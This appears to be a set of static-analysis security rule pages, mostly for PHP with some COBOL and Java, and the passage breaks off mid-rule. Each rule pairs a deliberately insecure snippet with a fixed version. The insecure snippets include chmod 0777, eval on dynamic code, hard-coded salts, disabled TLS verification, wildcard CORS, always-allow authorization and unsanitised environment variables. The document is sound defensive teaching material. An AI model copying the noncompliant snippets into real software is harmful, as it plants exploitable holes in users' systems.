sleep is sometimes used in a mistaken attempt to prevent Denial of Service (DoS) attacks by throttling response rate. But because it ties up a thread, each request takes longer to serve that it otherwise would, making the application more vulnerable to DoS attacks, rather than less.

Noncompliant code example

if (is_bad_ip($requester)) {
  sleep(5);  // Noncompliant
}

Resources

php:S5328

If a session ID can be guessed (not generated with a secure pseudo random generator, or with insufficient length …​) an attacker may be able to hijack another user’s session.

Ask Yourself Whether

  • the session ID is not unique.
  • the session ID is set from a user-controlled input.
  • the session ID is generated with not secure pseudo random generator.
  • the session ID length is too short.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Don’t manually generate session IDs, use instead language based native functionality.

Sensitive Code Example

session_id(bin2hex(random_bytes(4))); // Sensitive: 4 bytes is too short
session_id($_POST["session_id"]); // Sensitive: session ID can be specified by the user

Compliant Solution

session_regenerate_id(); ; // Compliant
session_id(bin2hex(random_bytes(16))); // Compliant

See

php:S2612

In Unix file system permissions, the "others" category refers to all users except the owner of the file system resource and the members of the group assigned to this resource.

Granting permissions to this category can lead to unintended access to files or directories that could allow attackers to obtain sensitive information, disrupt services or elevate privileges.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

chmod("foo", 0777); // Sensitive
umask(0); // Sensitive
umask(0750); // Sensitive

For Symfony Filesystem:

use Symfony\Component\Filesystem\Filesystem;

$fs = new Filesystem();
$fs->chmod("foo", 0777); // Sensitive

For Laravel Filesystem:

use Illuminate\Filesystem\Filesystem;

$fs = new Filesystem();
$fs->chmod("foo", 0777); // Sensitive

Compliant Solution

chmod("foo", 0750); // Compliant
umask(0027); // Compliant

For Symfony Filesystem:

use Symfony\Component\Filesystem\Filesystem;

$fs = new Filesystem();
$fs->chmod("foo", 0750); // Compliant

For Laravel Filesystem:

use Illuminate\Filesystem\Filesystem;

$fs = new Filesystem();
$fs->chmod("foo", 0750); // Compliant

See

php:S1523

Executing code dynamically is security-sensitive. It has led in the past to the following vulnerabilities:

Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific meta-programming use-cases. However most of the time their use is frowned upon as they also increase the risk of Injected Code. Such attacks can either run on the server or in the client (exemple: XSS attack) and have a huge impact on an application’s security.

This rule marks for review each occurrence of the eval function. This rule does not detect code injections. It only highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.

Ask Yourself Whether

  • the executed code may come from an untrusted source and hasn’t been sanitized.
  • you really need to run code dynamically.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the code in a sandboxed environment. Use jails, firewalls and whatever means your operating system and programming language provide (example: Security Managers in java, iframes and same-origin policy for javascript in a web browser).

Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.

Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.

Sensitive Code Example

eval($code_to_be_dynamically_executed)

See

php:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' passwords and salts couple might be low depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using longer, cryptographically secure salt should be preferred.

How to fix it in Core PHP

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

$salt = 'salty';
$hash = hash_pbkdf2('sha256', $password, $salt, 100000); // Noncompliant

Compliant solution

$salt = random_bytes(16);
$hash = hash_pbkdf2('sha256', $password, $salt, 100000);

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

Here, the compliant code example ensures the salt is random and has a sufficient length by calling the random_bytes function with a length parameter set to 16. This one internally uses a cryptographically secure pseudo random number generator.

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
php:S6348

By default, the WordPress administrator and editor roles can add unfiltered HTML content in various places, such as post content. This includes the capability to add JavaScript code.

If an account with such a role gets hijacked, this capability can be used to plant malicious JavaScript code that gets executed whenever somebody visits the website.

Ask Yourself Whether

  • You really need the possibility to add unfiltered HTML with editor or administrator roles.
  • There’s a chance that the accounts of authorized users get compromised.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The unfiltered_html capability should be granted to trusted roles that need to use markup when publishing dynamic content to the WordPress website. If this capability is not required for all users, including administrators and editors roles, then it’s recommended to set DISALLOW_UNFILTERED_HTML to true.

Sensitive Code Example

define( 'DISALLOW_UNFILTERED_HTML', false ); // sensitive

Compliant Solution

define( 'DISALLOW_UNFILTERED_HTML', true );

See

php:S6345

External requests initiated by a WordPress server should be considered as security-sensitive. They may contain sensitive data which is stored in the files or in the database of the server. It’s important for the administrator of a WordPress server to understand what they contain and to which server they are sent.

WordPress makes it possible to block external requests by setting the WP_HTTP_BLOCK_EXTERNAL option to true. It’s then possible to authorize requests to only a few servers using another option named WP_ACCESSIBLE_HOSTS.

Ask Yourself Whether

  • Your WordPress website contains code which may call external requests to servers you don’t know.
  • Your WordPress website may send sensitive data to other servers.
  • Your WordPress website uses a lot of plugins or themes.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Uninstall WordPress plugins which send requests to servers you don’t know.
  • Make sure that WP_HTTP_BLOCK_EXTERNAL is defined in wp-config.php.
  • Make sure that WP_HTTP_BLOCK_EXTERNAL is set to true.
  • Make sure that WP_ACCESSIBLE_HOSTS is configured to authorize requests to the servers you trust.

Sensitive Code Example

define( 'WP_HTTP_BLOCK_EXTERNAL', false ); // Sensitive

Compliant Solution

define( 'WP_HTTP_BLOCK_EXTERNAL', true );
define( 'WP_ACCESSIBLE_HOSTS', 'api.wordpress.org' );

See

php:S6346

WordPress has a database repair and optimization mode that can be activated by setting WP_ALLOW_REPAIR to true in the configuration.

If activated, the repair page can be accessed by any user, authenticated or not. This makes sense because if the database is corrupted, the authentication mechanism might not work.

Malicious users could trigger this potentially costly operation repeatadly slowing down the website, and making it unavailable.

Ask Yourself Whether

  • The database is not currently corrupted.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

It’s recommended to enable automatic database repair mode only in case of database corruption. This feature should be deactivated again when the database issue is resolved.

Sensitive Code Example

define( 'WP_ALLOW_REPAIR', true ); // Sensitive

Compliant Solution

// The default value is false, so the value does not have to be expilicitly set.
define( 'WP_ALLOW_REPAIR', false );

See

php:S6341

WordPress makes it possible to edit theme and plugin files directly in the Administration Screens. While it may look like an easy way to customize a theme or do a quick change, it’s a dangerous feature. When visiting the theme or plugin editor for the first time, WordPress displays a warning to make it clear that using such a feature may break the web site by mistake. More importantly, users who have access to this feature can trigger the execution of any PHP code and may therefore take full control of the WordPress instance. This security risk could be exploited by an attacker who manages to get access to one of the authorized users. Setting the DISALLOW_FILE_EDIT option to true in wp-config.php disables this risky feature. The default value is false.

Ask Yourself Whether

  • You really need to use the theme and plugin editors.
  • The theme and plugin editors are available to users who cannot be fully trusted.
  • There’s a chance that the accounts of authorized users get compromised.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Modify the theme and plugin files using a local editor and deploy them to the server in a secure way.
  • Make sure that DISALLOW_FILE_EDIT is defined in wp-config.php.
  • Make sure that DISALLOW_FILE_EDIT is set to true.

Sensitive Code Example

define( 'DISALLOW_FILE_EDIT', false ); // Sensitive

Compliant Solution

define( 'DISALLOW_FILE_EDIT', true );

See

php:S6343

Automatic updates are a great way of making sure your application gets security updates as soon as they are available. Once a vendor releases a security update, it is crucial to apply it in a timely manner before malicious actors exploit the vulnerability. Relying on manual updates is usually too late, especially if the application is publicly accessible on the internet.

Ask Yourself Whether

  • there is no specific reason for deactivating all automatic updates.
  • you meant to deactivate only automatic major updates.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Don’t deactivate automatic updates unless you have a good reason to do so. This way, you’ll be sure to receive security updates as soon as they are available. If you are worried about an automatic update breaking something, check if it is possible to only activate automatic updates for minor or security updates.

Sensitive Code Example

define( 'WP_AUTO_UPDATE_CORE', false ); // Sensitive
define( 'AUTOMATIC_UPDATER_DISABLED', true ); // Sensitive

Compliant Solution

define( 'WP_AUTO_UPDATE_CORE', true ); // Minor and major automatic updates enabled
define( 'WP_AUTO_UPDATE_CORE', 'minor' ); // Only minor updates are enabled
define( 'AUTOMATIC_UPDATER_DISABLED', false );

See

php:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($socket, '8.8.8.8', 23);  // Sensitive

Compliant Solution

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_connect($socket, IP_ADDRESS, 23);  // Compliant

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

php:S4828

Signaling processes or process groups can seriously affect the stability of this application or other applications on the same system.

Accidentally setting an incorrect PID or signal or allowing untrusted sources to assign arbitrary values to these parameters may result in a denial of service.

Also, the system treats the signal differently if the destination PID is less than or equal to 0. This different behavior may affect multiple processes with the same (E)UID simultaneously if the call is left uncontrolled.

Ask Yourself Whether

  • The parameters pid and sig are untrusted (they come from an external source).
  • This function is triggered by non-administrators.
  • Signal handlers on the target processes stop important functions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For stateful applications with user management, ensure that only administrators trigger this code.
  • Verify that the pid and sig parameters are correct before using them.
  • Ensure that the process sending the signals runs with as few OS privileges as possible.
  • Isolate the process on the system based on its (E)UID.
  • Ensure that the signal does not interrupt any essential functions when intercepted by a target’s signal handlers.

Sensitive Code Example

$targetPid = (int)$_GET["pid"];
posix_kill($targetPid, 9); // Sensitive

Compliant Solution

$targetPid = (int)$_GET["pid"];

// Validate the untrusted PID,
// With a pre-approved list or authorization checks
if (isValidPid($targetPid)) {
    posix_kill($targetPid, 9);
}

See

php:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.

Sensitive Code Example

// Any reference to STDIN is Sensitive
$varstdin = STDIN; // Sensitive
stream_get_line(STDIN, 40); // Sensitive
stream_copy_to_stream(STDIN, STDOUT); // Sensitive
// ...


// Except those references as they can't create an injection vulnerability.
ftruncate(STDIN, 5); // OK
ftell(STDIN); // OK
feof(STDIN); // OK
fseek(STDIN, 5); // OK
fclose(STDIN); // OK


// STDIN can also be referenced like this
$mystdin = 'php://stdin'; // Sensitive

file_get_contents('php://stdin'); // Sensitive
readfile('php://stdin'); // Sensitive

$input = fopen('php://stdin', 'r'); // Sensitive
fclose($input); // OK

See

php:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered as insecure.

This rule raises an issue when on every program entry points (main methods) when command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing them in the command line. It is common to write them on the process' standard input, or give the path to a file containing the information.

Sensitive Code Example

Builtin access to $argv

function globfunc() {
    global $argv; // Sensitive. Reference to global $argv
    foreach ($argv as $arg) { // Sensitive.
        // ...
    }
}

function myfunc($argv) {
    $param = $argv[0]; // OK. Reference to local $argv parameter
    // ...
}

foreach ($argv as $arg) { // Sensitive. Reference to $argv.
    // ...
}

$myargv = $_SERVER['argv']; // Sensitive. Equivalent to $argv.

function serve() {
    $myargv = $_SERVER['argv']; // Sensitive.
    // ...
}

myfunc($argv); // Sensitive

$myvar = $HTTP_SERVER_VARS[0]; // Sensitive. Note: HTTP_SERVER_VARS has ben removed since PHP 5.4.

$options = getopt('a:b:'); // Sensitive. Parsing arguments.

$GLOBALS["argv"]; // Sensitive. Equivalent to $argv.

function myglobals() {
    $GLOBALS["argv"]; // Sensitive
}

$argv = [1,2,3]; // Sensitive. It is a bad idea to override argv.

Zend Console

new Zend\Console\Getopt(['myopt|m' => 'this is an option']); // Sensitive

Getopt-php library

new \GetOpt\Option('m', 'myoption', \GetOpt\GetOpt::REQUIRED_ARGUMENT); // Sensitive

See

php:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in cURL

Code examples

The following code contains examples of disabled certificate validation.

The certificate validation gets disabled by setting CURLOPT_SSL_VERIFYPEER to false. To enable validation set the value to true or do not set CURLOPT_SSL_VERIFYPEER at all to use the secure default value.

Noncompliant code example

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'https://example.com/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // Noncompliant
curl_exec($curl);
curl_close($curl);

Compliant solution

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'https://example.com/');
curl_exec($curl);
curl_close($curl);

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

php:S6339

Why is this an issue?

Secret keys are used in combination with an algorithm to encrypt data. A typical use case is an authentication system. For such a system to be secure, the secret key should have a value which cannot be guessed and which is long enough to not be vulnerable to brute-force attacks.

A "salt" is an extra piece of data which is included when hashing data such as a password. Its value should have the same properties as a secret key.

This rule raises an issue when it detects that a secret key or a salt has a predictable value or that it’s not long enough.

Noncompliant code example

WordPress:

define('AUTH_KEY', 'hello'); // Noncompliant
define('AUTH_SALT', 'hello'); // Noncompliant
define('AUTH_KEY', 'put your unique phrase here'); // Noncompliant, this is the default value

Compliant solution

WordPress:

define('AUTH_KEY', 'D&ovlU#|CvJ##uNq}bel+^MFtT&.b9{UvR]g%ixsXhGlRJ7q!h}XWdEC[BOKXssj');
define('AUTH_SALT', 'FIsAsXJKL5ZlQo)iD-pt??eUbdc{_Cn<4!d~yqz))&B D?AwK%)+)F2aNwI|siOe');

Resources

php:S5808

Why is this an issue?

Authorizations granted or not to users to access resources of an application should be based on strong decisions. For instance, checking whether the user is authenticated or not, has the right roles/privileges. It may also depend on the user’s location, or the date, time when the user requests access.

Noncompliant code example

In a Symfony web application:

  • the vote method of a VoterInterface type is not compliant when it returns only an affirmative decision (ACCESS_GRANTED):
class NoncompliantVoterInterface implements VoterInterface
{
    public function vote(TokenInterface $token, $subject, array $attributes)
    {
        return self::ACCESS_GRANTED; // Noncompliant
    }
}
  • the voteOnAttribute method of a Voter type is not compliant when it returns only an affirmative decision (true):
class NoncompliantVoter extends Voter
{
    protected function supports(string $attribute, $subject)
    {
        return true;
    }

    protected function voteOnAttribute(string $attribute, $subject, TokenInterface $token)
    {
        return true; // Noncompliant
    }
}

In a Laravel web application:

  • the define, before, and after methods of a Gate are not compliant when they return only an affirmative decision (true or Response::allow()):
class NoncompliantGuard
{
    public function boot()
    {
        Gate::define('xxx', function ($user) {
            return true; // Noncompliant
        });

        Gate::define('xxx', function ($user) {
            return Response::allow(); // Noncompliant
        });
    }
}

Compliant solution

In a Symfony web application:

  • the vote method of a VoterInterface type should return a negative decision (ACCESS_DENIED) or abstain from making a decision (ACCESS_ABSTAIN):
class CompliantVoterInterface implements VoterInterface
{
    public function vote(TokenInterface $token, $subject, array $attributes)
    {
        if (foo()) {
            return self::ACCESS_GRANTED; // Compliant
        } else if (bar()) {
            return self::ACCESS_ABSTAIN;
        }
        return self::ACCESS_DENIED;
    }
}
  • the voteOnAttribute method of a Voter type should return a negative decision (false):
class CompliantVoter extends Voter
{
    protected function supports(string $attribute, $subject)
    {
        return true;
    }

    protected function voteOnAttribute(string $attribute, $subject, TokenInterface $token)
    {
        if (foo()) {
            return true; // Compliant
        }
        return false;
    }
}

In a Laravel web application:

  • the define, before, and after methods of a Gate should return a negative decision (false or Response::deny()) or abstain from making a decision (null):
class NoncompliantGuard
{
    public function boot()
    {
        Gate::define('xxx', function ($user) {
            if (foo()) {
                return true; // Compliant
            }
            return false;
        });

        Gate::define('xxx', function ($user) {
            if (foo()) {
                return Response::allow(); // Compliant
            }
            return Response::deny();
        });
    }
}

Resources

php:S4834

This rule is deprecated, and will eventually be removed.

The access control of an application must be properly implemented in order to restrict access to resources to authorized entities otherwise this could lead to vulnerabilities:

Granting correct permissions to users, applications, groups or roles and defining required permissions that allow access to a resource is sensitive, must therefore be done with care. For instance, it is obvious that only users with administrator privilege should be authorized to add/remove the administrator permission of another user.

Ask Yourself Whether

  • Granted permission to an entity (user, application) allow access to information or functionalities not needed by this entity.
  • Privileges are easily acquired (eg: based on the location of the user, type of device used, defined by third parties, does not require approval …​).
  • Inherited permission, default permission, no privileges (eg: anonymous user) is authorized to access to a protected resource.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

At minimum, an access control system should:

  • Use a well-defined access control model like RBAC or ACL.
  • Entities' permissions should be reviewed regularly to remove permissions that are no longer needed.
  • Respect the principle of least privilege ("an entity has access only the information and resources that are necessary for its legitimate purpose").

Sensitive Code Example

CakePHP

use Cake\Auth\BaseAuthorize;
use Cake\Controller\Controller;

abstract class MyAuthorize extends BaseAuthorize { // Sensitive. Method extending Cake\Auth\BaseAuthorize.
    // ...
}

// Note that "isAuthorized" methods will only be detected in direct subclasses of Cake\Controller\Controller.
abstract class MyController extends Controller {
    public function isAuthorized($user) { // Sensitive. Method called isAuthorized in a Cake\Controller\Controller.
        return false;
    }
}

See

php:S5122

Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:

Same origin policy in browsers prevents, by default and for security-reasons, a javascript frontend to perform a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port) from its own. The requested target can append additional HTTP headers in response, called CORS, that act like directives for the browser and change the access control policy / relax the same origin policy.

Ask Yourself Whether

  • You don’t trust the origin specified, example: Access-Control-Allow-Origin: untrustedwebsite.com.
  • Access control policy is entirely disabled: Access-Control-Allow-Origin: *
  • Your access control policy is dynamically defined by a user-controlled input like origin header.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • The Access-Control-Allow-Origin header should be set only for a trusted origin and for specific resources.
  • Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks).

Sensitive Code Example

PHP built-in header function:

header("Access-Control-Allow-Origin: *"); // Sensitive

Laravel:

response()->header('Access-Control-Allow-Origin', "*"); // Sensitive

Symfony:

use Symfony\Component\HttpFoundation\Response;

$response = new Response(
    'Content',
    Response::HTTP_OK,
    ['Access-Control-Allow-Origin' => '*'] // Sensitive
);
$response->headers->set('Access-Control-Allow-Origin', '*'); // Sensitive

User-controlled origin:

use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\Request;

$origin = $request->headers->get('Origin');

$response->headers->set('Access-Control-Allow-Origin', $origin); // Sensitive

Compliant Solution

PHP built-in header function:

header("Access-Control-Allow-Origin: $trusteddomain");

Laravel:

response()->header('Access-Control-Allow-Origin', $trusteddomain);

Symfony:

use Symfony\Component\HttpFoundation\Response;

$response = new Response(
    'Content',
    Response::HTTP_OK,
    ['Access-Control-Allow-Origin' => $trusteddomain]
);

$response->headers->set('Access-Control-Allow-Origin', $trusteddomain);

User-controlled origin validated with an allow-list:

use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpFoundation\Request;

$origin = $request->headers->get('Origin');

if (in_array($origin, $trustedOrigins)) {
    $response->headers->set('Access-Control-Allow-Origin', $origin);
}

See

php:S2092

When a cookie is protected with the secure attribute set to true it will not be send by the browser over an unencrypted HTTP request and thus cannot be observed by an unauthorized person during a man-in-the-middle attack.

Ask Yourself Whether

  • the cookie is for instance a session-cookie not designed to be sent over non-HTTPS communication.
  • it’s not sure that the website contains mixed content or not (ie HTTPS everywhere or not)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to use HTTPs everywhere so setting the secure flag to true should be the default behaviour when creating cookies.
  • Set the secure flag to true for session-cookies.

Sensitive Code Example

In php.ini you can specify the flags for the session cookie which is security-sensitive:

session.cookie_secure = 0; // Sensitive: this security-sensitive session cookie is created with the secure flag set to false (cookie_secure = 0)

Same thing in PHP code:

session_set_cookie_params($lifetime, $path, $domain, false);
// Sensitive: this security-sensitive session cookie is created with the secure flag (the fourth argument) set to _false_

If you create a custom security-sensitive cookie in your PHP code:

$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, false);  // Sensitive: a security-sensitive cookie is created with the secure flag  (the sixth argument) set to _false_

By default setcookie and setrawcookie functions set the sixth argument / secure flag to false:

$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain);  // Sensitive: a security-sensitive cookie is created with the secure flag (the sixth argument) not defined (by default to false)
setrawcookie($name, $value, $expire, $path, $domain);  // Sensitive: a security-sensitive cookie is created with the secure flag (the sixth argument) not defined (by default to false)

Compliant Solution

session.cookie_secure = 1; // Compliant: the sensitive cookie will not be send during an unencrypted HTTP request thanks to cookie_secure property set to 1
session_set_cookie_params($lifetime, $path, $domain, true); // Compliant: the sensitive cookie will not be send during an unencrypted HTTP request thanks to the secure flag (the fouth argument) set to true
$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, true); // Compliant: the sensitive cookie will not be send during an unencrypted HTTP request thanks to the secure flag (the sixth  argument) set to true
setrawcookie($name, $value, $expire, $path, $domain, true);// Compliant: the sensitive cookie will not be send during an unencrypted HTTP request thanks to the secure flag (the sixth argument) set to true

See

cobol:S3394

Why is this an issue?

The ACCEPT keyword does no editing or error checking of the data it stores, therefore its use can be dangerous. For this reason, ACCEPT should be avoided.

Noncompliant code example

 01 USER-INPUT PIC X(4).

  GET-USER-INPUT.
       MOVE 'N' TO WS-NUMERIC.
       PERFORM UNTIL WS-NUMERIC = 'Y'
           DISPLAY 'ENTER YOUR 4 DIGIT RECORD NUMBER: ' NO ADVANCING
           ACCEPT USER-RECORD *> Noncompliant

Exceptions

This rule ignores uses of ACCEPT FROM with date/time-related inputs.

Resources

javasecurity:S6547

Why is this an issue?

Environment variable injection occurs in an application when the application receives data from a user or a third-party service and, without sanitizing it first, does the following:

  • Creates an environment variable based on the external data.
  • Inserts the external data into certain sensitive environment variables, such as PATH or LD_PRELOAD.
    If an application uses environment variables that are vulnerable to injection, it is exposed
    to a variety of attacks that aim to exploit supposedly safe environment variables, such as `PATH`.
    

A user with malicious intent carefully performs actions aimed at modifying or adding environment variables to profit from it.

What is the potential impact?

When user-supplied values are used to manipulate environment variables, an attacker can supply carefully chosen values that cause the system to behave unexpectedly.
In some cases, the attacker can use this capability to execute arbitrary code on the server.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Application-specific attacks

In this scenario, the attacker manages to inject an environment variable that is recognized and used by the remote system. For example, this could be the secret of a particular cloud provider used in an environment variable, or PATH.

Depending on the application, the attacker can read or modify important data or perform unwanted actions.
For example, injecting data into the HTTP_PROXY variable could lead to data leakage.

Application compromise

In the worst case, an attacker manages to inject an important environment variable such as ` LD _PRELOAD` and execute code by overriding trusted code.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, and for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

This threat is particularly insidious if the attacked organization does not maintain a Disaster Recovery Plan (DRP).

How to fix it in Java SE

Code examples

The following code is vulnerable to environment variable manipulation as it constructs the variables from untrusted data.

Noncompliant code example

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
  Runtime r = Runtime.getRuntime();
  String userInput = request.getParameter("example");

  if (userInput != null) {
    String[] envs = {userInput};
    r.exec("/path/to/example", userInput);
  } else{
    r.exec("/path/to/example");
  }
}

Compliant solution

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException {
  Runtime r = Runtime.getRuntime();
  String userInput = request.getParameter("example");

  if (userInput != null && userInput.matches("^[a-zA-Z0-9]*$")) {
    String[] envs = {"ENV_VAR=%s".format(userInput)};
    r.exec("/path/to/example", envs);
  } else {
    r.exec("/path/to/example");
  }
}

How does this work?

User input should be properly sanitized and validated, and ideally used only for the value of the environment variable. The environment variable name should be statically defined.

Validation and sanitization could be done by restricting alphanumeric characters for the value and evaluating the name, if not statically defined, against an allowlist of name values.

Resources

Standards

javasecurity:S6549

Why is this an issue?

Applications behave as filesystem oracles when they disclose to attackers if resources from the filesystem exist or not.

A user with malicious intent would inject specially crafted values, such as ../, to change the initially intended path. The resulting path would resolve to a location somewhere in the filesystem which the user should not normally have access to.

What is the potential impact?

An attacker exploiting a filesystem oracle vulnerability can determine if a file exists or not.

The files that can be affected are limited by the permission of the process that runs the application. Worst case scenario: the process runs with elevated privileges, and therefore any file can be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Information gathering

The vulnerability is exploited to gather information about the host system. The filesystem oracle can help identify user accounts, running services, or the exact version of installed software.

How to fix it in Java SE

Code examples

